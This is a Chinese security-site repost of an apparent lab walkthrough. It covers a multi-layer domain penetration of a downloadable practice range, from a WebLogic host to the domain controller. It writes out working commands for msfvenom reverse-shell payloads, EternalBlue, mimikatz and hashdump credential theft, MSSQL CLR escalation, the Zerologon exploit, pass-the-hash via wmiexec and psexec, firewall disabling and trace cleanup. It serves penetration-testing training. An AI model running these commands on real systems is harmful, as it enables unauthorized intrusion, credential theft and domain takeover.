您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

从外网打点到内网横向渗透——多层网络域渗透项目总结

时间:2022-08-06 14:38:10  来源:  作者:江江111

前言

本次多层网络域渗透项目旨在模拟渗透测试人员在授权的情况下对目标进行渗透测试, 从外网打点到内网横向渗透, 最终获取整个内网权限的过程.

环境搭建

靶场下载地址:

https://pan.bAIdu.com/s/1DOaDrsDsB2aW0sHSO_-fZQ
提取码: vbi2

靶场网络拓扑图为:

各靶机信息:

域控: windows Server 2008 + IIS + Exchange 2013 邮件服务
目录还原密码: redteam!@#45
主机名: owa
域管理员: administrator:Admin12345!


域内服务器Mssql: Windows Server 2008 + SQL Server 2008 (被配置了非约束委派)
主机名: sqlserver-2008
本地管理员:Administrator:Admin12345
域账户: redteamsqlserver:Server12345 (被配置了约束委派)
Mssql: sa:sa


域内个人PC: Windows 7
主机名: work-7
本地管理员:john: admin!@#45
域账户: redteamsaul:admin!@#45

单机服务器: Windows server r2 + weblogic
主机名: weblogic
本地管理员:Administrator:Admin12345
weblogic : weblogic: weblogic123(访问 http://ip:7001)
weblogic 安装目录: C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain(手动运行下 startWebLogic.cmd)


其他域用户: 
域服务账户: redteamsqlserver:Server12345 (被配置了约束委派)
邮件用户: redteammail:admin!@#45
加域账户: redteamadduser:Add12345
redteamsaulgoodman:Saul12345 (被配置了非约束委派)
redteamgu:Gu12345
redteamapt404:Apt12345

开启Windows Server 2012 R2后, 在C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain目录下双击startWebLogic.cmd启动weblogic.

渗透测试

单机服务器

假定我们已经拿到了靶标IP192.168.10.22. 利用Nmap对靶标进行简易的扫描: nmap.exe -p1-65535 -Pn -A -T4 192.168.10.22.

根据扫描结果发现7001端口存在Oracle WebLogic, 扫一梭子看看有没有漏洞, 从扫描结果来看还是存在挺多漏洞的.

直接上工具开打, 发现是administrator的权限, 直接注入内存马, 冰蝎上线.

域内个人 PC

当拿下DMZ区域的机器后, 除了权限维持和权限提升, 对于横向渗透通常分一下两个方面:

  • 判断机器是否为多网卡机器, 然后扫描其他网段, 来发现更多存在漏洞的机器;
  • 尽量收集机器上面的敏感信息, 比如敏感内部文件、账号密码本等, 帮助后面快速突破防线.

由于我们拿下的机器已经是administrator权限, 直接进行信息搜集即可, tasklist查看进程发现不存在杀软.

利用msfvenom生成一个payloadmsfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.9 LPORT=7777 -f exe > shell.exe, 上传到靶机后, MSF上线.

抓一下密码:

  • 抓取自动登录的密码: run windows/gather/credentials/windows_autologin.
  • 导出密码哈希: hashdump.

拿到Administrator的密码Admin12345, 同时查询域信息: .NET view /domain, 发现该机器并不在域内.

查询网络信息发现是双网卡, 利用fscan扫描一下网段: fscan64.exe -h 10.10.20.0/24 > result.txt, 发现网段内存在新的机器10.10.20.7445端口是开放的, 疑似存在MS17-010漏洞.

添加路由, 扫描一下MS17-010.

run get_local_subnets
run autoroute -s 10.10.20.0/24
run autoroute -p

search ms17-010
use 3
set rhost 10.10.20.7
run

发现的确存在MS17-010, 利用exploit/windows/smb/ms17_010_eternalblue进行攻击, 成功拿下该机器.

search ms17-010
use 0
set payload windows/x64/meterpreter/bind_tcp
set lport 11111
run

先查看一下权限, 发现直接就是system权限, 也不需要进行提权的操作, 用mimikatz抓一下密码, 发现该主机在域环境redteam.red内, 并且拿到一组域账户的用户名和密码: saul:admin!@#45.

load mimikatz
creds_all

用其他的方式继续抓一下密码, 成功拿到一组本地用户的用户名及密码: john:admin!@#45.

hashdump
run windows/gather/smart_hashdump
run windows/gather/credentials/windows_autologin

域内服务器 Mssql

查看网段发现新网段, 继续添加路由.

上传一个fscan, 扫描一下网段, 发现存在一台Windows Server 2008 R2机器: 10.10.10.18, 开放了1433端口, 并且获得一组弱口令: sa:sa.

MSF配合Proxifier开启socks代理隧道, 利用SharpSQLTools执行命令, 发现是10.10.10.18机器是一个低权限的账号network service.

参考MSSQL 利用 CLR 技术执行系统命令中的方法, 进行clr提权, 成功提权到system权限.

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

利用exploit/windows/mssql/mssql_clr_payload模块, 先用低权限账号上线, 接着上传木马, 利用SharpSQLTools运行得到高权限.

接着使用mimikatz抓取一下凭证, 得到两个用户的用户名和密码: Administrator:Admin12345sqlserver:Server12345.

域控

由于不存在新的网段了, 在前面fscan的扫描结果中还存在一个10.10.10.8的地址, 不出意外该地址的机器就是域控了, 下面看看该如何拿下该台机子.

先确定一下该台机器是否是域控制器, 常见的方法有:

  • 扫描内网中同时开放38953端口的机器.

  • 查看域控制器组: net group "domain controllers" /domain.

  • 查看域控的机器名: nslookup redteam.red; nslookup -type=SRV _ldap._tcp.

  • 查看域控当前时间: net time /domain.

确定该台机器是域控制器后, 根据其版本信息尝试用Netlogon特权提升漏洞CVE-2020-1472进行攻击, 详细内容见内网渗透-账号提权.

在验证存在Netlogon特权提升漏洞后, 先重置一下域账号, 置空密码: Python/ target=_blank class=infotextkey>Python cve-2020-1472-exploit.py OWA 10.10.10.8.

接着读取域控中的hashpython secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass.

获取到的hash后利用impacket中的wmiexec.py脚本进行登录, 成功拿到shellpython wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e redteam.red/administrator@10.10.10.8 -codec gbk.

此时, 成功获取到了域控的shell. 但是这个shell并不是稳定的, 真实环境中我们还需要进一步进行权限维持的操作, 在得到hash之后, 先利用前面获取到的shell关闭一下防火墙netsh advfirewall set allprofiles state off, 接着便可以使用PSEXEC模块上线MSF并进行后续的操作了.

use exploit/windows/smb/psexec
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.10.8
set lport 4446
run

需要注意的是, 在做完权限维持后要及时恢复域控的密码, 不然域控会脱域.

我们先导出SAM中原来的hash, 利用MSFshell下载下来并及时删除, 清理痕迹.

reg save HKLMSYSTEM system.save
reg save HKLMSAM sam.save
reg save HKLMSECURITY security.save

download C:\sam.save C:\Users\95235\Desktop\sam.save
download C:\security.save C:\Users\95235\Desktop\security.save
download C:\system.save C:\Users\95235\Desktop\system.save

del /f sam.save
del /f system.save
del /f security.save

接着利用脚本secretsdump.py查看一下域控的hashpython secretsdump.py -sam sam.save -system system.save -security security.save LOCAL.

利用脚本reinstall_original_pw.py恢复hashpython reinstall_original_pw.py OWA 10.10.10.8 f4044edaafbdca41a6e53d234c14ab9a.

最后利用空密码再次进行连接来验证是否恢复成功: python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass.

效果图

总结

由于打过几次线下的CFS靶场, 使用CS感觉不佳, 本次打靶过程中就只使用了MSF, 正好锻炼一下自己对于MSF各功能的使用, 打靶过程中的收获还是挺大的. 靶机附件里面也给出了一个靶场存在漏洞的说明, 感兴趣的师傅们也可以根据漏洞说明尝试一下其他的打法.

对于靶机要说明的就是网盘里面分享的是一个完整的压缩包然后从中间直接拆分出来的两个数据块, 使用的时候合并起来就行. 另一个sqlserver-2008那台机器的Sql Server 2008好像过期了, 我是用命令行直接开启的: net start mssqlserver.



Tags:渗透   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
跨境电商渗透率加大,外贸生意的这些界限变模糊了
作者:缪琦全球跨境支付公司pingpong联合创始人卢帅最近注意到了平台的一项增长数据——2024年1月1日~3月3日,既是外贸B2B收付款用户又是跨境电商(B2C)收款用户的占比...【详细内容】
2024-04-18  Search: 渗透  点击:(6)  评论:(0)  加入收藏
详解渗透测试和漏洞扫描的开源自动化解决方案
译者 | 刘涛审校 | 重楼目录 什么是渗透测试 规划和侦察 扫描 开发和获得访问权限 维持访问权 报告和控制 什么是漏洞扫描 渗透测试工具 渗透测试的自动化 渗透自动化工作流...【详细内容】
2024-02-27  Search: 渗透  点击:(38)  评论:(0)  加入收藏
渗透测试中最常见的漏洞有哪些?
什么是渗透测试?渗透测试是一项安全测试,旨在模拟黑客的攻击方式,评估系统、网络或应用程序的安全性,发现潜在的安全漏洞并提出建议来修复它们。渗透测试中最常见的漏洞包括:1....【详细内容】
2024-01-11  Search: 渗透  点击:(110)  评论:(0)  加入收藏
网络安全中的渗透测试主要有几个方面
渗透测试中主要有软件测试和渗透测试。1、测试对象不同软件测试:主要测试的是程序、数据、文档。渗透测试:对象主要为网络设备、主机操作系统、数据库系统和应用系统。2、测试...【详细内容】
2023-11-02  Search: 渗透  点击:(92)  评论:(0)  加入收藏
RouterSploit:一款功能强大的嵌入式设备渗透测试框架
关于RouterSploitRouterSploit是一款功能强大的嵌入式设备渗透测试与漏洞利用框架,该工具是一款完全开源的工具,基于Python语言开发,可以帮助广大研究人员检测嵌入式设备中潜在...【详细内容】
2023-09-27  Search: 渗透  点击:(308)  评论:(0)  加入收藏
AIGC正向医院渗透 能否打破AI医疗僵局?
作者: 林志吟以ChatGPT为代表的AIGC(生成式AI)风靡市场,掀起了生成式大语言模型的开发浪潮,这一波浪潮席卷至医疗行业,行业中的“百模大战”正在迅速兴起。一直以来,医疗行业被视为...【详细内容】
2023-09-18  Search: 渗透  点击:(100)  评论:(0)  加入收藏
从AI模特换装到AIGC赋能运营,生成式AI全方位渗透电商产业链
文 | 王吉伟 生成式AI席卷电商领域,AIGC赋能厂商与客户增效降本 生成式AI已经热了这么久,厂商们在电商领域都有哪些探索? 从AI模特换装到AIGC赋能运营,生成式AI全方位渗透电商产...【详细内容】
2023-09-09  Search: 渗透  点击:(324)  评论:(0)  加入收藏
​ 来探讨看看关于MacOS 应用程序中的渗透测试
在当今数字时代,网络安全和应用程序的安全性问题已成为我们生活和工作中必须关注的一个重要问题。无论是个人还是组织,我们都需要采取措施来保护我们的计算机和网络系统,防止恶...【详细内容】
2023-08-16  Search: 渗透  点击:(244)  评论:(0)  加入收藏
安全专业人员必备的网络渗透测试工具
安全行业更经常使用用于渗透测试的网络安全工具来测试网络和应用程序中的漏洞。在这里,您可以找到综合网络安全工具列表,其中涵盖了在所有环境中执行渗透测试操作。网络安全工...【详细内容】
2023-06-14  Search: 渗透  点击:(158)  评论:(0)  加入收藏
渗透测试和黑客工具列表
安全行业更常使用渗透测试和黑客工具来测试网络和应用程序中的漏洞。在这里,您可以找到涵盖在所有环境中执行渗透测试操作的综合渗透测试和黑客工具列表。渗透测试和道德黑客...【详细内容】
2023-06-10  Search: 渗透  点击:(226)  评论:(0)  加入收藏
▌简易百科推荐
小心“黑客”利用445端口攻击你的Win8系统!
Windows 8系统自带一个名为SMB(Server Message Block)的服务,使用445端口进行通信。这个服务主要用于文件共享和网络协议等功能,但是无良黑客也会利用这个服务来攻击你的电脑。...【详细内容】
2024-04-10    潘小姐  Tags:445端口   点击:(18)  评论:(0)  加入收藏
为什么黑客不去攻击微信钱包?
在这个数字化时代,网络安全已经成为我们生活中不可或缺的一部分。每当我们打开手机,使用微信钱包进行支付时,是否曾有过这样的疑问:为什么黑客不去攻击微信钱包?这个问题,就像是在...【详细内容】
2024-02-19  猫探长情报局  今日头条  Tags:黑客   点击:(59)  评论:(0)  加入收藏
发条消息就能破解iPhone?苹果系统这次像被“内鬼”攻破的。。。
前几天,差评君在网上冲浪的时候,看到了一条相当震撼的消息:简单来讲,就是主打封闭安全的 iPhone ,不仅被攻击者发现了漏洞成功入侵,完全控制整个手机。更加抽象的是入侵的还是知名...【详细内容】
2024-01-26  差评    Tags:破解iPhone   点击:(143)  评论:(0)  加入收藏
十种黑客攻击手段及防御方法
在互联网的世界里,网站安全犹如一座城堡,需要严密的防线来抵御各种攻击手段。以下是10种最常见的网络攻击手段,以及我们如何采取措施来保护我们的网站。1. 跨站脚本攻击:这是黑...【详细内容】
2024-01-21  老吴讲IT    Tags:黑客攻击   点击:(88)  评论:(0)  加入收藏
渗透测试中最常见的漏洞有哪些?
什么是渗透测试?渗透测试是一项安全测试,旨在模拟黑客的攻击方式,评估系统、网络或应用程序的安全性,发现潜在的安全漏洞并提出建议来修复它们。渗透测试中最常见的漏洞包括:1....【详细内容】
2024-01-11  五湖联技术服务公司    Tags:渗透测试   点击:(110)  评论:(0)  加入收藏
作为一名黑客/安全专家,应该掌握什么技能?熟悉哪些软件/工具?
作为一名合格的黑客/网络安全专家,应该具备一套全面的知识体系和实战技能,同时熟悉多种安全软件和工具。今天我们将根据目前市面上流行的一些应用程序,以及常规的安全防护措施,...【详细内容】
2023-12-11  黑客联盟I    Tags:黑客   点击:(144)  评论:(0)  加入收藏
黑客是如何入侵一个网站的?(网络安全人员应该了解的知识)
前不久阿里以及滴滴系统的大规模瘫痪足以唤起人们对网络安全的重视。我首先必须澄清的是,作为一个网络安全专家,我不提供或者鼓励任何违法的行为,包括未经授权的计算机系统入侵...【详细内容】
2023-12-07  黑客联盟I    Tags:黑客   点击:(179)  评论:(0)  加入收藏
网络黑客入侵解析:保护你的网络安全
在当今数字化快速发展的时代,网络安全问题逐渐成为人们关注的焦点。网络黑客入侵事件频发,给个人和企业带来了严重的威胁。本文将深入解析网络黑客入侵的常见手段和原因,并探讨...【详细内容】
2023-12-05  小记青春    Tags:黑客入侵   点击:(165)  评论:(0)  加入收藏
黑客滥用 Google 表单进行诈骗
研究人员最近发现滥用 Google 表单的垃圾邮件有所增加,攻击者首先在 Google 表单中创建新的问卷调查,并且利用受害者的电子邮件地址参与问卷调查,滥用 Google 表单的功能将垃圾...【详细内容】
2023-11-23  区块软件开发  今日头条  Tags:黑客   点击:(230)  评论:(0)  加入收藏
黑客工具 Flipper Zero 曝光,可利用蓝牙弹出窗口崩溃 iPhone
据外媒 9to5Mac 报道,一种流行且廉价的黑客设备 Flipper Zero 今年 9 月首次出现,可通过制造蓝牙弹出窗口,向 iPhone 和 iPad 重复告诉发送垃圾内容,直到相关设备最终崩溃,不过直...【详细内容】
2023-11-20  IT之家    Tags:黑客工具   点击:(242)  评论:(0)  加入收藏
站内最新
站内热门
站内头条